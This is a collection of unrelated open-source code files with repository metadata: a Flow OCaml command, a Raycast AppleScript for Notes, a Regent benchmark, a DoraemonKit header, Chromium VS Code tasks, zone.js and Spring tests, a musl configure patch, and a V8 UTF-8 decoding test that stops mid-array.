let json = JSON_Object (List.append json_non_flow json_imports) in
print_json_endline ~pretty json
)
else
let print_imports module_name =
if SMap.mem module_name requirements_map then (
let requirements = SMap.find module_name requirements_map in
Printf.printf "Imports for module '%s':\n" module_name;
List.iter
(fun (req, locs) ->
Nel.iter
(fun loc ->
let loc_str = range_string_of_loc ~strip_root loc in
Printf.printf "\t%s@%s\n" req loc_str)
locs)
requirements
) else if SSet.mem module_name non_flow then
Printf.printf
"Cannot obtain imports for module '%s' because is not\ marked for processing by flow!\n"
module_name
else
Printf.printf "Module '%s' could not be found!\n" module_name
in
List.iter print_imports modules;
flush stdout
let command = CommandSpec.command spec main
| OCaml | 4 | zhangmaijun/flow | src/commands/getImportsCommand.ml | [
"MIT"
] |
#!/usr/bin/osascript
# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title Search Note By Name
# @raycast.mode silent
# Optional parameters:
# @raycast.icon ./images/notes.png
# @raycast.argument1 { "type": "text", "placeholder": "Exact Note Name or a Substring" }
# @raycast.packageName Notes
# Documentation:
# @raycast.description This script searches for a note, given its exact name, or a substring, the search does not consider case
# if two notes or more have the same given substring the script will always show the first one
# @raycast.author Ayoub Gharbi
# @raycast.authorURL github.com/ayoub-g
on run argv
set note_to_search to (item 1 of argv)
tell application "Notes"
activate
set search_complete to false
set note_found to false
set folder_index to 1
set folders_count to (count of folders)
repeat while search_complete is false
set note_index to 1
set end_list to false
set leave_list to false
set note_names to (name of notes of folder folder_index)
repeat while leave_list is false
set note_name to item note_index of note_names
if note_to_search is in note_name then
show note note_name
set note_found to true
set search_complete to true
end if
set note_index to (note_index + 1)
if note_index > (count of note_names) then
set end_list to true
end if
set leave_list to end_list or note_found
end repeat
set folder_index to (folder_index + 1)
if folder_index > folders_count then
set search_complete to true
end if
end repeat
end tell
end run | AppleScript | 4 | daviddzhou/script-commands | commands/apps/notes/search-note-by-name.applescript | [
"MIT"
] |
-- Copyright (c) 2015, NVIDIA CORPORATION. All rights reserved.
--
-- Redistribution and use in source and binary forms, with or without
-- modification, are permitted provided that the following conditions
-- are met:
-- * Redistributions of source code must retain the above copyright
-- notice, this list of conditions and the following disclaimer.
-- * Redistributions in binary form must reproduce the above copyright
-- notice, this list of conditions and the following disclaimer in the
-- documentation and/or other materials provided with the distribution.
-- * Neither the name of NVIDIA CORPORATION nor the names of its
-- contributors may be used to endorse or promote products derived
-- from this software without specific prior written permission.
--
-- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
-- EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-- IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-- PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-- CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
-- EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
-- PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
-- OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-- (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import "regent"
-- Compile and link helpers
local cinc
do
local root_dir = arg[0]:match(".*/") or "./"
local runtime_dir = root_dir .. "../../runtime"
local inc_cc = root_dir .. "inc.cc"
local inc_so = os.tmpname() .. ".so" -- root_dir .. "inc.so"
local cxx = os.getenv('CXX') or 'c++'
local cxx_flags = "-O2 -std=c++0x -Wall -Werror"
if os.execute('test "$(uname)" = Darwin') == 0 then
cxx_flags =
(cxx_flags ..
" -dynamiclib -single_module -undefined dynamic_lookup -fPIC")
else
cxx_flags = cxx_flags .. " -shared -fPIC"
end
local cmd = (cxx .. " " .. cxx_flags .. " -I " .. runtime_dir .. " " ..
inc_cc .. " -o " .. inc_so)
if os.execute(cmd) ~= 0 then
print("Error: failed to compile " .. inc_cc)
assert(false)
end
terralib.linklibrary(inc_so)
cinc = terralib.includec("inc.h", {"-I", root_dir, "-I", runtime_dir})
end
local c = regentlib.c
-- Utility functions
function raw(t)
return terra(x : t) return x.__ptr end
end
terra nop() end
terra min(x : int64, y : int64) : int64
if x < y then
return x
else
return y
end
end
terra ite(c : bool, x : int64, y : int64) : int64
if c then
return x
else
return y
end
end
-- Tasks
__demand(__cuda)
task inc(r: region(int64), y : int64)
where
reads(r), writes(r)
do
__demand(__vectorize)
for x in r do
@x += y
end
end
task inc1(r : region(int64), p : partition(disjoint, r), m : int64, y : int64)
where
reads(r), writes(r)
do
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
end
task inc2(r : region(int64), p : partition(disjoint, r), m : int64, y : int64)
where
reads(r), writes(r)
do
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
end
__demand(__cuda)
task dummy(r : region(int64))
where reads(r) do
return 0
end
task dummy1(r : region(int64), p : partition(disjoint, r), m : int64)
where reads(r) do
var x = 0
__demand(__parallel)
for i = 0, m do
x += dummy(p[i])
end
return x
end
terra bulk_allocate(runtime : c.legion_runtime_t,
ctx : c.legion_context_t,
r : c.legion_logical_region_t,
n : int64)
var is = r.index_space
var a = c.legion_index_allocator_create(runtime, ctx, is)
c.legion_index_allocator_alloc(a, n)
c.legion_index_allocator_destroy(a)
end
terra bulk_coloring(n : int64, m : int64) : c.legion_coloring_t
var ic = c.legion_coloring_create()
var npercolor = n/m
for color = 0, m do
var start = color*npercolor + min(color, n%m)
var pieces = npercolor + ite(color < n%m, 1, 0)
c.legion_coloring_add_range(
ic, color,
c.legion_ptr_t { value = start },
c.legion_ptr_t { start+pieces-1 })
end
return ic
end
terra wait_for(x : int)
return x
end
task test(n: int64, m : int64)
var r = region(ispace(ptr, n), int64)
c.printf("allocating...\n")
bulk_allocate(__runtime(), __context(), __raw(r), n)
c.printf("coloring...\n")
var rc = bulk_coloring(n, m)
c.printf("partitioning...\n")
var p = partition(disjoint, r, rc)
c.legion_coloring_destroy(rc)
c.printf("initializing...\n")
var i2 = 0
for x in r do
@x = i2
nop() -- FIXME: Codegen messes up without this.
i2 += 1
end
-- Warmup
c.printf("warmup...\n")
inc1(r, p, m, 0)
nop() -- FIXME: Avoid task fusion here.
inc2(r, p, m, 0)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
-- Timed runs
c.printf("timing inc1...\n")
var start_time = c.legion_get_current_time_in_micros()/1.e6
inc1(r, p, m, 100)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
var end_time = c.legion_get_current_time_in_micros()/1.e6
var total_time = end_time - start_time
c.printf("inc1 elapsed time = %.6e\n", total_time)
c.printf("inc1 bandwidth = %.6e\n", n*[sizeof(int64)]*2 / total_time)
c.printf("inc1 iops = %.6e\n", n / total_time)
c.printf("timing inc2...\n")
start_time = c.legion_get_current_time_in_micros()/1.e6
inc2(r, p, m, 10)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
end_time = c.legion_get_current_time_in_micros()/1.e6
total_time = end_time - start_time
c.printf("inc2 elapsed time = %.6e\n", total_time)
c.printf("inc2 bandwidth = %.6e\n", n*[sizeof(int64)]*2 / total_time)
c.printf("inc2 iops = %.6e\n", n*2 / total_time)
c.printf("validating...\n")
var i3 : int64 = 0
for x in r do
var y = @x
var z = 120 + i3
if y ~= z then c.printf("output %ld is %ld\n", i3, y) end
regentlib.assert(y == z, "test failed")
i3 += 1
end
end
task main()
-- test(16777216, 2) -- 128 MB
-- test(33554432, 4) -- 256 MB
-- test(67108864, 8) -- 512 MB
-- test(134217728, 16) -- 1 GB
test(268435456, 32) -- 2 GB
-- test(536870912, 64) -- 4 GB
end
cinc.register_mappers()
regentlib.start(main)
| Rouge | 5 | rupanshusoi/rdir | examples/inc.rg | [
"Apache-2.0",
"BSD-3-Clause"
] |
fileFormatVersion: 2
guid: 8b12ac54c5224758af88c67e2af4a01e
timeCreated: 1604359666 | Unity3D Asset | 0 | cihan-demir/NineMensMorris | MLPYthonEnv/ml-agents-release_17/com.unity.ml-agents/Runtime/Analytics.meta | [
"MIT"
] |
//
// DoraemonMCXPath.h
// DoraemonKit-DoraemonKit
//
// Created by litianhao on 2021/7/13.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
@interface DoraemonMCXPathNode : NSObject
// 控件在父视图上的索引
@property (nonatomic , assign) NSUInteger index;
// 控件的类名
@property (nonatomic , copy) NSString *className;
+ (instancetype)nodeWithString:(NSString *)string;
@end
@interface DoraemonMCXPathSerializer : NSObject
/// 当前控件是否在复用模式容器的单元格 例如:UITableViewCell, UICollectionViewCell
@property (nonatomic , assign) BOOL isOneCell ;
/// 如果isOneCell为true , 这个字段有值 列表容器的XPath 例如 UITableView , UICollectionView
@property (nonatomic , strong , readonly) NSArray<DoraemonMCXPathNode *> *listContainerPathNodeList;
/// 如果isOneCell为true , 这个字段有值 代表当前控件所在cell在列表容器中的索引
@property (nonatomic , strong ) NSIndexPath *cellIndexPath;
/// 从根window到当前控件的XPath 如果isOneCell为true , 就代表从listContainer到当前控件的XPath
@property (nonatomic , copy , readonly) NSArray<DoraemonMCXPathNode *> *pathNodeList;
/// 控件所在window在当前所有window数组的索引
@property (nonatomic , assign) NSInteger windowIndex;
/// 控件所在window的类名
@property (nonatomic , copy ) NSString *windowClsName;
/// 控件所在window的根控制器类名
@property (nonatomic , copy ) NSString *windowRootVCClsName;
/// 默认false
@property (nonatomic , assign) BOOL ignore;
/// 控件所在控制器类名
@property (nonatomic , weak ) UIViewController *vcCls;
/// 根据控件获取XPath描述对象
+ (instancetype )xPathInstanceWithView:(UIView *)view;
/// 解析网络上传过来的xpath字符串信息,生成xPath对象
+ (instancetype)xPathInstanceFromXpath:(NSString *)xpath;
/// 根据控件获取XPath在网络上传输的字符串
+ (NSString *)xPathStringWithView:(UIView *)view ;
/// 根据网络上传过来的xpath字符串还原uiview
+ (UIView *)viewFromXpath:(NSString *)xpath;
/// 根据当前信息生成xPath在网络上传输的字符串
- (NSString *)generalPathToTransfer;
/// 根据当前的xPath信息查找到对应的view
- (UIView *)fetchView;
// 获取view所在控制器
+ (UIViewController *)ownerVCWithView:(UIView *)view ;
@end
NS_ASSUME_NONNULL_END
| C | 4 | didichuxing/DoraemonKit | iOS/DoraemonKit/Src/MultiControl/Function/EventSync/Serialize/XPath/DoraemonMCXPathSerializer.h | [
"Apache-2.0"
] |
{
// Note!
// Set the value used for ${config:chrome.outputDir} in your settings.json
// file with a line like:
// "chrome.outputDir": "/path/to/chromium/src/out/current_link",
// Then run "0-set_chrome_output_directory" to set the `current_link`
// symbolic link (see below).
"version": "2.0.0",
"runner": "terminal",
// The default problem matcher matches build output, which is useful for most tasks.
"problemMatcher": [
{
"owner": "cpp",
"fileLocation": ["relative", "${config:chrome.outputDir}"],
"pattern": {
"regexp": "^(gen/.*):(\\d+):(\\d+):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "line": 2, "column": 3, "severity": 4, "message": 5
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${workspaceRoot}"],
"pattern": {
"regexp": "^../../(.*):(\\d+):(\\d+):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "line": 2, "column": 3, "severity": 4, "message": 5
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${config:chrome.outputDir}"],
"pattern": {
"regexp": "^(gen/.*?):(.*):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "severity": 3, "message": 4
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${workspaceRoot}"],
"pattern": {
"regexp": "^../../(.*?):(.*):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "severity": 3, "message": 4
}
}
],
"options": {
// It's important to set the CWD to the output directory so that file paths
// are linked correctly in the terminal output.
"cwd": "${config:chrome.outputDir}"
},
"inputs": [
{
// See 'Set Chrome Output Directory'.
"type": "pickString",
"id": "chromeOutputDir",
"description": "Chrome output directory:",
// Configure this to point to all the output directories you use.
"options": [
"/path/to/chromium/src/out/pc",
"/path/to/chromium/src/out/Debug",
"/path/to/chromium/src/out/Debug_x86"
]
},
{
"type": "promptString",
"id": "gtestFilter",
"description": "Filter for 4-test_current_file_with_filter",
"default": "*"
}
],
"tasks": [
// Set the Chrome output directory to be used in future task runs.
// This uses a symbolic link to remember the current output directory.
// If you want to use this, make sure chrome.outputDir is configured to
// point to the link created at ${workspaceFolder}/out/current_link.
// Alternatively:
// * If you want to be prompted for the output directory each
// time you run a command, replace
// ${config:chrome.outputDir}
// with
// ${input:chromeOutputDir}
// everywhere in this file.
//
// * If you want to have different tasks for different output directories,
// just create duplicate tasks and hard-code the output directory used.
{
"label": "0-set_chrome_output_directory",
"command": "rm -f ${workspaceFolder}/out/current_link; ln -s ${input:chromeOutputDir} ${workspaceFolder}/out/current_link",
"type": "shell",
// The default problem matcher doesn't make sense here, so remove it.
"problemMatcher": [],
"options": {
"cwd": "${workspaceFolder}"
}
},
// Some general-purpose build and test tasks. These all inherit the
// problemMatcher at the top of the file.
{
"label": "1-build_chrome",
"type": "shell",
"command": "autoninja -C ${config:chrome.outputDir} chrome",
"group": "test"
},
{
"label": "2-build_all",
"type": "shell",
"command": "autoninja -C ${config:chrome.outputDir}"
},
{
"label": "3-test_current_file",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --run-all ${file}"
},
{
"label": "4-test_current_file_with_filter",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --gtest_filter ${input:gtestFilter} ${file}"
},
{
"label": "5-test_current_line",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --line ${lineNumber} ${file}"
},
{
"label": "6-test_current_directory",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --run-all ${fileDirname}"
},
{
"label": "7-build_current_file",
"type": "shell",
"command": "compile_single_file --build-dir=${config:chrome.outputDir} --file-path=${file}"
},
// Some more specific build tasks, which hard-code the output directory.
{
"label": "8-build_chrome_debug",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Debug chrome"
},
{
"label": "9-build_chrome_release",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Release chrome"
},
{
"label": "10-build_test_debug",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Debug unit_tests components_unittests browser_tests"
},
{
"label": "11-generate_compile_commands",
"type": "shell",
"command": "${workspaceFolder}/tools/clang/scripts/generate_compdb.py -p ${config:chrome.outputDir} > ${workspaceFolder}/compile_commands.json"
}
]
}
| JSON5 | 4 | zealoussnow/chromium | tools/vscode/tasks.json5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
/**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {interval, merge, Observable} from 'rxjs';
import {map, take} from 'rxjs/operators';
import {asyncTest} from '../test-util';
describe('Observable.merge', () => {
let log: any[];
beforeEach(() => {
log = [];
});
it('merge func callback should run in the correct zone', asyncTest((done: any) => {
const constructorZone1: Zone = Zone.current.fork({name: 'Constructor Zone1'});
const constructorZone2: Zone = Zone.current.fork({name: 'Constructor Zone2'});
const constructorZone3: Zone = Zone.current.fork({name: 'Constructor Zone3'});
const subscriptionZone: Zone = Zone.current.fork({name: 'Subscription Zone'});
const observable1: any = constructorZone1.run(() => {
return interval(8).pipe(map(v => 'observable1' + v), take(1));
});
const observable2: any = constructorZone2.run(() => {
return interval(10).pipe(map(v => 'observable2' + v), take(1));
});
const observable3: any = constructorZone3.run(() => {
return merge(observable1, observable2);
});
subscriptionZone.run(() => {
const subscriber = observable3.subscribe(
(result: any) => {
log.push(result);
expect(Zone.current.name).toEqual(subscriptionZone.name);
},
() => {
fail('should not call error');
},
() => {
log.push('completed');
expect(Zone.current.name).toEqual(subscriptionZone.name);
expect(log).toEqual(['observable10', 'observable20', 'completed']);
done();
});
});
}, Zone.root));
});
| TypeScript | 4 | raghavendramohan/angular | packages/zone.js/test/rxjs/rxjs.merge.spec.ts | [
"MIT"
] |
/*
* Copyright 2002-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.context.expression;
import java.lang.reflect.Method;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import org.junit.jupiter.api.Test;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.util.ReflectionUtils;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
/**
* @author Stephane Nicoll
*/
public class CachedExpressionEvaluatorTests {
private final TestExpressionEvaluator expressionEvaluator = new TestExpressionEvaluator();
@Test
public void parseNewExpression() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
Expression expression = expressionEvaluator.getTestExpression("true", method, getClass());
hasParsedExpression("true");
assertThat(expression.getValue()).isEqualTo(true);
assertThat(expressionEvaluator.testCache.size()).as("Expression should be in cache").isEqualTo(1);
}
@Test
public void cacheExpression() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, getClass());
hasParsedExpression("true");
assertThat(expressionEvaluator.testCache.size()).as("Only one expression should be in cache").isEqualTo(1);
}
@Test
public void cacheExpressionBasedOnConcreteType() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, Object.class);
assertThat(expressionEvaluator.testCache.size()).as("Cached expression should be based on type").isEqualTo(2);
}
private void hasParsedExpression(String expression) {
verify(expressionEvaluator.getParser(), times(1)).parseExpression(expression);
}
private static class TestExpressionEvaluator extends CachedExpressionEvaluator {
private final Map<ExpressionKey, Expression> testCache = new ConcurrentHashMap<>();
public TestExpressionEvaluator() {
super(mockSpelExpressionParser());
}
public Expression getTestExpression(String expression, Method method, Class<?> type) {
return getExpression(this.testCache, new AnnotatedElementKey(method, type), expression);
}
private static SpelExpressionParser mockSpelExpressionParser() {
SpelExpressionParser parser = new SpelExpressionParser();
return spy(parser);
}
}
}
| Java | 5 | nicchagil/spring-framework | spring-context/src/test/java/org/springframework/context/expression/CachedExpressionEvaluatorTests.java | [
"Apache-2.0"
] |
diff --git a/configure b/configure
index 86801281..ed2f7998 100755
--- a/configure
+++ b/configure
@@ -398,7 +398,7 @@ test "$debug" = yes && CFLAGS_AUTO=-g
#
printf "checking whether we should preprocess assembly to add debugging information... "
if fnmatch '-g*|*\ -g*' "$CFLAGS_AUTO $CFLAGS" &&
- test -f "tools/add-cfi.$ARCH.awk" &&
+ test -f "$srcdir/tools/add-cfi.$ARCH.awk" &&
printf ".file 1 \"srcfile.s\"\n.line 1\n.cfi_startproc\n.cfi_endproc" | $CC -g -x assembler -c -o /dev/null 2>/dev/null -
then
ADD_CFI=yes
| Diff | 3 | ohno418/rust | src/ci/docker/scripts/musl-patch-configure.diff | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
// Copyright 2016 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <memory>
#include <string>
#include <vector>
#include "src/base/vector.h"
#include "src/strings/unicode-decoder.h"
#include "src/strings/unicode-inl.h"
#include "testing/gtest/include/gtest/gtest.h"
namespace v8 {
namespace internal {
namespace {
void DecodeNormally(const std::vector<byte>& bytes,
std::vector<unibrow::uchar>* output) {
size_t cursor = 0;
while (cursor < bytes.size()) {
output->push_back(
unibrow::Utf8::ValueOf(bytes.data() + cursor, bytes.size(), &cursor));
}
}
void DecodeUtf16(const std::vector<uint8_t>& bytes,
std::vector<unibrow::uchar>* output) {
auto utf8_data = base::Vector<const uint8_t>::cast(base::VectorOf(bytes));
Utf8Decoder decoder(utf8_data);
std::vector<uint16_t> utf16(decoder.utf16_length());
decoder.Decode(utf16.data(), utf8_data);
// Decode back into code points
for (size_t i = 0; i < utf16.size(); i++) {
uint16_t b = utf16[i];
if (unibrow::Utf16::IsLeadSurrogate(b)) {
output->push_back(unibrow::Utf16::CombineSurrogatePair(b, utf16[++i]));
} else {
output->push_back(b);
}
}
}
void DecodeIncrementally(const std::vector<byte>& bytes,
std::vector<unibrow::uchar>* output) {
unibrow::Utf8::Utf8IncrementalBuffer buffer = 0;
unibrow::Utf8::State state = unibrow::Utf8::State::kAccept;
const byte* cursor = bytes.data();
const byte* end = bytes.data() + bytes.size();
while (cursor < end) {
unibrow::uchar result =
unibrow::Utf8::ValueOfIncremental(&cursor, &state, &buffer);
if (result != unibrow::Utf8::kIncomplete) {
output->push_back(result);
}
}
unibrow::uchar result = unibrow::Utf8::ValueOfIncrementalFinish(&state);
if (result != unibrow::Utf8::kBufferEmpty) {
output->push_back(result);
}
}
} // namespace
TEST(UnicodeTest, Utf16BufferReuse) {
// Not enough continuation bytes before string ends.
struct TestCase {
std::vector<byte> bytes;
std::vector<unibrow::uchar> unicode_expected;
};
TestCase data[] = {
{{0x00}, {0x0}},
{{0xC2, 0x80}, {0x80}},
{{0xE0, 0xA0, 0x80}, {0x800}},
{{0xF0, 0x90, 0x80, 0x80}, {0x10000}},
{{0xE0, 0xA0, 0x80}, {0x800}},
{{0xC2, 0x80}, {0x80}},
{{0x00}, {0x0}},
};
for (auto test : data) {
// For figuring out which test fails:
fprintf(stderr, "test: ");
for (auto b : test.bytes) {
fprintf(stderr, "%x ", b);
}
fprintf(stderr, "\n");
std::vector<unibrow::uchar> output_utf16;
DecodeUtf16(test.bytes, &output_utf16);
CHECK_EQ(output_utf16.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_utf16.size(); ++i) {
CHECK_EQ(output_utf16[i], test.unicode_expected[i]);
}
}
}
TEST(UnicodeTest, SurrogateOverrunsBuffer) {
std::vector<unibrow::uchar> output_utf16;
// Not enough continuation bytes before string ends.
DecodeUtf16({0x00, 0xF0, 0x90, 0x80, 0x80, 0x00}, &output_utf16);
CHECK_EQ(output_utf16[0], 0x00);
CHECK_EQ(output_utf16[1], 0x10000);
CHECK_EQ(output_utf16[0], 0x00);
}
TEST(UnicodeTest, IncrementalUTF8DecodingVsNonIncrementalUtf8Decoding) {
// Unfortunately, V8 has two UTF-8 decoders. This test checks that they
// produce the same result. This test was inspired by
// https://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt .
struct TestCase {
std::vector<byte> bytes;
std::vector<unibrow::uchar> unicode_expected;
};
TestCase data[] = {
// Correct UTF-8 text.
{{0xCE, 0xBA, 0xE1, 0xBD, 0xB9, 0xCF, 0x83, 0xCE, 0xBC, 0xCE, 0xB5},
{0x3BA, 0x1F79, 0x3C3, 0x3BC, 0x3B5}},
// First possible sequence of a certain length:
// 1 byte
{{0x00}, {0x0}},
// 2 bytes
{{0xC2, 0x80}, {0x80}},
// 3 bytes
{{0xE0, 0xA0, 0x80}, {0x800}},
// 4 bytes
{{0xF0, 0x90, 0x80, 0x80}, {0x10000}},
// 5 bytes (not supported)
{{0xF8, 0x88, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 bytes (not supported)
{{0xFC, 0x84, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Last possible sequence of certain length:
// 1 byte
{{0x7F}, {0x7F}},
// 2 bytes
{{0xDF, 0xBF}, {0x7FF}},
// 3 bytes
{{0xEF, 0xBF, 0xBF}, {0xFFFF}},
// 4 bytes (this sequence is not a valid code point)
{{0xF7, 0xBF, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5 bytes (not supported)
{{0xFB, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 bytes (not supported)
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Other boundary conditions:
{{0xED, 0x9F, 0xBF}, {0xD7FF}},
{{0xEE, 0x80, 0x80}, {0xE000}},
// U+fffd (invalid code point)
{{0xEF, 0xBF, 0xBD}, {0xFFFD}},
// U+10ffff (last valid code point)
{{0xF4, 0x8F, 0xBF, 0xBF}, {0x10FFFF}},
// First invalid (too large) code point
{{0xF4, 0x90, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Malformed sequences:
// Unexpected continuation bytes:
// First continuation byte
{{0x80}, {0xFFFD}},
// Last continuation byte
{{0xBF}, {0xFFFD}},
// 2 continuation bytes
{{0x80, 0xBF}, {0xFFFD, 0xFFFD}},
// 3 continuation bytes
{{0x80, 0xBF, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
// 4 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 7 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Sequence of all 64 possible continuation bytes
{{0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A,
0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95,
0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0,
0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB,
0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6,
0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Using each possible continuation byte in a two-byte sequence:
{{0xD0, 0x80, 0xD0, 0x81, 0xD0, 0x82, 0xD0, 0x83, 0xD0, 0x84, 0xD0, 0x85,
0xD0, 0x86, 0xD0, 0x87, 0xD0, 0x88, 0xD0, 0x89, 0xD0, 0x8A, 0xD0, 0x8B,
0xD0, 0x8C, 0xD0, 0x8D, 0xD0, 0x8E, 0xD0, 0x8F, 0xD0, 0x90, 0xD0, 0x91,
0xD0, 0x92, 0xD0, 0x93, 0xD0, 0x94, 0xD0, 0x95, 0xD0, 0x96, 0xD0, 0x97,
0xD0, 0x98, 0xD0, 0x99, 0xD0, 0x9A, 0xD0, 0x9B, 0xD0, 0x9C, 0xD0, 0x9D,
0xD0, 0x9E, 0xD0, 0x9F, 0xD0, 0xA0, 0xD0, 0xA1, 0xD0, 0xA2, 0xD0, 0xA3,
0xD0, 0xA4, 0xD0, 0xA5, 0xD0, 0xA6, 0xD0, 0xA7, 0xD0, 0xA8, 0xD0, 0xA9,
0xD0, 0xAA, 0xD0, 0xAB, 0xD0, 0xAC, 0xD0, 0xAD, 0xD0, 0xAE, 0xD0, 0xAF,
0xD0, 0xB0, 0xD0, 0xB1, 0xD0, 0xB2, 0xD0, 0xB3, 0xD0, 0xB4, 0xD0, 0xB5,
